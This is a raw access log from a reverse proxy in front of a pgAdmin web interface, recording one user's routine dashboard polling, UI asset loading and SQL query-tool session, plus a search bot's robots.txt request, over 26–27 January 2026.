+[26/Jan/2026:10:19:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:19:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:20:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:20:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:21:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:21:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:22:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:22:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:22:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:23:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:23:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:24:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:24:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:25:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:25:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:26:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:26:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:27:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:27:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:27:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:28:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:28:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:29:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:29:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:30:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:30:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:01:32:03 +0000] - 404 404 - GET https db.profibot.hu "/robots.txt" [Client 74.7.230.46] [Length 184] [Gzip 1.20] [Sent-to pgadmin_ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[27/Jan/2026:08:07:12 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 84.1.26.27] [Length 205] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[27/Jan/2026:08:07:12 +0000] - 200 200 - GET https db.profibot.hu "/browser/" [Client 84.1.26.27] [Length 2933] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[27/Jan/2026:08:07:12 +0000] - 200 200 - GET https db.profibot.hu "/browser/browser.css?ver=91100" [Client 84.1.26.27] [Length 4180] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:13 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico?ver=91100" [Client 84.1.26.27] [Length 245] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:13 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/browser_nodes.js?ver=91100" [Client 84.1.26.27] [Length 27716] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:13 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/app.bundle.js?ver=91100" [Client 84.1.26.27] [Length 567018] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:13 +0000] - 200 200 - GET https db.profibot.hu "/static/favicon.ico?ver=91100" [Client 84.1.26.27] [Length 78998] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:13 +0000] - 200 200 - GET https db.profibot.hu "/user_management/current_user.js?ver=91100" [Client 84.1.26.27] [Length 477] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:13 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/utils.js?ver=91100" [Client 84.1.26.27] [Length 3132] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:13 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:13 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:13 +0000] - 200 200 - GET https db.profibot.hu "/static/js/pgadmin.js?ver=91100" [Client 84.1.26.27] [Length 1209] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:13 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/messages.js?ver=91100" [Client 84.1.26.27] [Length 883] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:13 +0000] - 200 200 - GET https db.profibot.hu "/browser/server/supported_servers.js?ver=91100" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:13 +0000] - 200 200 - GET https db.profibot.hu "/static/js/gettext.js?ver=91100" [Client 84.1.26.27] [Length 577] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/misc/bgprocess/" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/browser/check_corrupted_db_file" [Client 84.1.26.27] [Length 61] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/preferences/get_all" [Client 84.1.26.27] [Length 11809] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/settings/get_tree_state/" [Client 84.1.26.27] [Length 429] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/browser/nodes/" [Client 84.1.26.27] [Length 273] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:14 +0000] - 200 200 - POST https db.profibot.hu "/browser/master_password" [Client 84.1.26.27] [Length 166] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/new_connection_dialog" [Client 84.1.26.27] [Length 313] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/new_connection_dialog" [Client 84.1.26.27] [Length 313] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/settings/object_explorer_filter" [Client 84.1.26.27] [Length 95] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/browser/server_group/static/img/server_group.svg?ver=91100" [Client 84.1.26.27] [Length 1432] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/browser.css?ver=91100" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/fonts/fa-solid-900..woff2" [Client 84.1.26.27] [Length 113152] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/static/js/generated/style.css?ver=91100" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/new_connection_dialog" [Client 84.1.26.27] [Length 313] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/fonts/fa-regular-400..woff2" [Client 84.1.26.27] [Length 18988] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/static/js/generated/style.css?ver=91100" +[27/Jan/2026:08:07:14 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" [Client 84.1.26.27] [Length 2906] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/new_connection_dialog" [Client 84.1.26.27] [Length 313] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/browser/browser.css?ver=91100" [Client 84.1.26.27] [Length 4180] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/sqleditor.js?ver=91100" [Client 84.1.26.27] [Length 458176] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/messages.js?ver=91100" [Client 84.1.26.27] [Length 883] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/user_management/current_user.js?ver=91100" [Client 84.1.26.27] [Length 477] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/browser/server/supported_servers.js?ver=91100" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:14 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/utils.js?ver=91100" [Client 84.1.26.27] [Length 3129] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:15 +0000] - 200 200 - GET https db.profibot.hu "/misc/upgrade_check?trigger_update_check=false" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:15 +0000] - 200 200 - GET https db.profibot.hu "/settings/get_tool_data/3857941" [Client 84.1.26.27] [Length 865] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:15 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/initialize/sqleditor/3857941/1/2/16384" [Client 84.1.26.27] [Length 101] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:15 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/fonts/SourceCodePro-Regular..ttf" [Client 84.1.26.27] [Length 192740] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/static/js/generated/style.css?ver=91100" +[27/Jan/2026:08:07:15 +0000] - 200 200 - POST https db.profibot.hu "/settings/store" [Client 84.1.26.27] [Length 77] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:15 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:16 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:17 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/server_group/children/1" [Client 84.1.26.27] [Length 390] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:18 +0000] - 200 200 - GET https db.profibot.hu "/browser/server/connect/1/2" [Client 84.1.26.27] [Length 314] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:07:18 +0000] - 